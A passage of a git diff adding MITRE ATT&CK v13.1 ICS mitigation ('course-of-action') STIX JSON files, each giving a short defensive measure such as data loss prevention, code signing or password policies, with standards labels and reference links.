"external_id": "M0944" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722.json new file mode 100644 index 0000000000000000000000000000000000000000..4bf191f892dc4aaf08f9ac151e89c6aeec4537c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722.json 
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--9d378897-1661-4ec7-8c8e-9daab267b879", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use security identifier (SID) Filtering, etc.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722", + "created": "2019-06-06T16:39:58.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0915", + "external_id": "M0915" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3172222b-4983-43f7-8983-753ded4f13bc.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3172222b-4983-43f7-8983-753ded4f13bc.json new file mode 100644 index 0000000000000000000000000000000000000000..83ebd1fbc6d0fd319e754a887368452d9be699a2 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3172222b-4983-43f7-8983-753ded4f13bc.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--ca7991c9-520c-4a00-a9ee-1802130364f5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:18.665Z", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries. In industrial control environments, network intrusion prevention should be configured so it will not disrupt protocols and communications responsible for real-time functions related to control or safety.", + "labels": [ + "IEC 62443-3-3:2013 - SR 6.2", + "IEC 62443-4-2:2019 - CR 6.2", + "NIST SP 800-53 Rev. 4 - SI-4" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "created": "2019-06-10T20:46:02.263Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0931", + "external_id": "M0931" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3.json new file mode 100644 index 0000000000000000000000000000000000000000..5e973e574381eac99a070d0e0cde601779cc19e6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--c4734fa7-3498-4f51-b03a-77b627ce541d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:17.759Z", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-6" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3", + "created": "2019-06-06T20:58:59.577Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0924", + "external_id": "M0924" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5.json new file mode 100644 index 0000000000000000000000000000000000000000..ee8e5efbd9bf0231365c7b554dc2ab1273549d2c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5.json 
@@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--0cd9a815-58b5-4fd3-8638-63722e21ee6a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:14.442Z", + "name": "Data Loss Prevention", + "description": "Data Loss Prevention (DLP) technologies can be used to help identify adversarial attempts to exfiltrate operational information, such as engineering plans, trade secrets, recipes, intellectual property, or process telemetry. DLP functionality may be built into other security products such as firewalls or standalone suites running on the network and host-based agents. DLP may be configured to prevent the transfer of information through corporate resources such as email, web, and physical media such as USB for host-based solutions.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0803", + "external_id": "M0803" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3.json new file mode 100644 index 0000000000000000000000000000000000000000..af0b960cbb899b22074ef24ec42bf3722ecd4e51 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--b1783e8d-5969-4cb0-b721-bbae9236d5a4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:14.081Z", + "name": "Access Management", + "description": "Access Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provided sufficient capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: Centre for the Protection of National Infrastructure November 2010)", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0801", + "external_id": "M0801" + }, + { + "source_name": "McCarthy, J et al. July 2018", + "description": "McCarthy, J et al. 2018, July NIST SP 1800-2 Identity and Access Management for Electric Utilities Retrieved. 2020/09/17 ", + "url": "https://doi.org/10.6028/NIST.SP.1800-2" + }, + { + "source_name": "Centre for the Protection of National Infrastructure November 2010", + "description": "Centre for the Protection of National Infrastructure 2010, November Configuring and Managing Remote Access for Industrial Control Systems Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/RP_Managing_Remote_Access_S508NC.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433.json new file mode 100644 index 0000000000000000000000000000000000000000..e3188a870fe2eb482584b8c38c0b7d8c761a67de --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--65d01bdf-a4c6-4920-9bc0-71997300128e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Mitigation Limited or Not Effective", + "description": "This type of attack technique cannot be easily mitigated with preventative controls since it is based on the abuse of system features.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0816", + "external_id": "M0816" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49363b74-d506-4342-bd63-320586ebadb9.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49363b74-d506-4342-bd63-320586ebadb9.json new file mode 100644 index 0000000000000000000000000000000000000000..68c577b213eb11c441fa0f4c827560db77b66897 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49363b74-d506-4342-bd63-320586ebadb9.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--91c8b241-8b61-4275-8427-0e1ebf3a0867", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:21.352Z", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - CR 3.2", + "NIST SP 800-53 Rev. 4 - SI-16" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "created": "2019-06-11T17:10:57.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0950", + "external_id": "M0950" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110.json new file mode 100644 index 0000000000000000000000000000000000000000..82e2931505cc83b68be0bec9afd5425adb6077af --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--74768b6e-3678-471a-89ed-61c619b9ca86", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:19.179Z", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 4 - AC-3; SC-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110", + "created": "2019-06-11T16:30:16.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0935", + "external_id": "M0935" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30.json new file mode 100644 index 0000000000000000000000000000000000000000..41ee94171f38ac7ed015c44f17ed0cc7f21ad510 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30.json 
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--575b2c0e-9b64-48b1-b078-2f1076c8c802",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:19.774Z",
+ "name": "Execution Prevention",
+ "description": "Block execution of code on a system through application control, and/or script blocking.",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 3.2",
+ "IEC 62443-4-2:2019 - CR 3.2",
+ "NIST SP 800-53 Rev. 4 - SI-3"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30",
+ "created": "2019-06-11T16:35:25.488Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0938",
+ "external_id": "M0938"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a.json
new file mode 100644
index 0000000000000000000000000000000000000000..532ef5e83aeb9e5bd3561ccd5722b9d67d3717c2
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a.json
@@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--c5e6021a-9dfa-41ba-90d9-e6a83a95a6ab", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T14:21:27.977Z", + "name": "Static Network Configuration", + "description": "Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various AiTM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "type": "course-of-action", + "id": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0814", + "external_id": "M0814" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65.json new file mode 100644 index 0000000000000000000000000000000000000000..58df66272457d3dd8af49a162c08497334f6842d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--c6b65eaf-ca3d-4525-8bac-260ec428bbcd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:18.097Z", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.5", + "IEC 62443-4-2:2019 - CR 1.5", + "NIST SP 800-53 Rev. 4 - IA-5" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "created": "2019-06-06T21:10:35.792Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0927", + "external_id": "M0927" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5.json new file mode 100644 index 0000000000000000000000000000000000000000..ad848a87750c045f80d92f0ef46ca1b43c389bd3 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--dea95d96-2784-4d32-a264-340694612d94", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:17.929Z", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.3", + "IEC 62443-4-2:2019 - CR 1.3", + "NIST SP 800-53 Rev. 4 - AC-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "created": "2019-06-06T21:09:47.115Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0926", + "external_id": "M0926" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0.json new file mode 100644 index 0000000000000000000000000000000000000000..b3dae18115213b0701559205fd316fefdd73ec4b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0.json 
@@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--558ef376-11d2-44a8-bc44-25b7de338151", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:14.615Z", + "name": "Human User Authentication", + "description": "Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [User Account Control](https://attack.mitre.org/mitigations/M1052).", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.1", + "IEC 62443-4-2:2019 - CR 1.1", + "NIST SP 800-53 Rev. 
4 - IA-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "type": "course-of-action", + "id": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0804", + "external_id": "M0804" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c.json new file mode 100644 index 0000000000000000000000000000000000000000..605903e3ca58173b9effb94c230ccfe139e263e0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c.json 
@@ -0,0 +1,32 @@
+{
+ "type": "bundle",
+ "id": "bundle--423f8cc1-f265-4d8c-8b8d-06adc54ec0db",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-24T15:09:07.609Z",
+ "name": "SSL/TLS Inspection",
+ "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c",
+ "created": "2019-06-06T20:15:34.146Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0920",
+ "external_id": "M0920"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a.json
new file mode 100644
index 0000000000000000000000000000000000000000..19bf72917d83cc27316101768338b6e7266350c3
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a.json
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--521f4a70-6d12-4f55-b045-1eb1d77ebef5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:20.464Z", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.4", + "IEC 62443-4-2:2019 - CR 3.4", + "NIST SP 800-53 Rev. 4 - SI-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "created": "2019-06-11T17:01:25.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0945", + "external_id": "M0945" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549.json new file mode 100644 index 0000000000000000000000000000000000000000..e833db91532688208882b22f45cffc6dbf86951f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--b3474fd4-e373-4351-a448-d8e9c758687e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:15.949Z", + "name": "Software Process and Device Authentication", + "description": "Require the authentication of devices and software processes where appropriate. Devices that connect remotely to other systems should require strong authentication to prevent spoofing of communications. Furthermore, software processes should also require authentication when accessing APIs.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.2", + "IEC 62443-4-2:2019 - CR 1.2", + "NIST SP 800-53 Rev. 4 - IA-9" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0813", + "external_id": "M0813" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a.json new file mode 100644 index 0000000000000000000000000000000000000000..24fbb18dcc9cc8afe78afff36d5dc97677ddc9cb --- /dev/null +++ 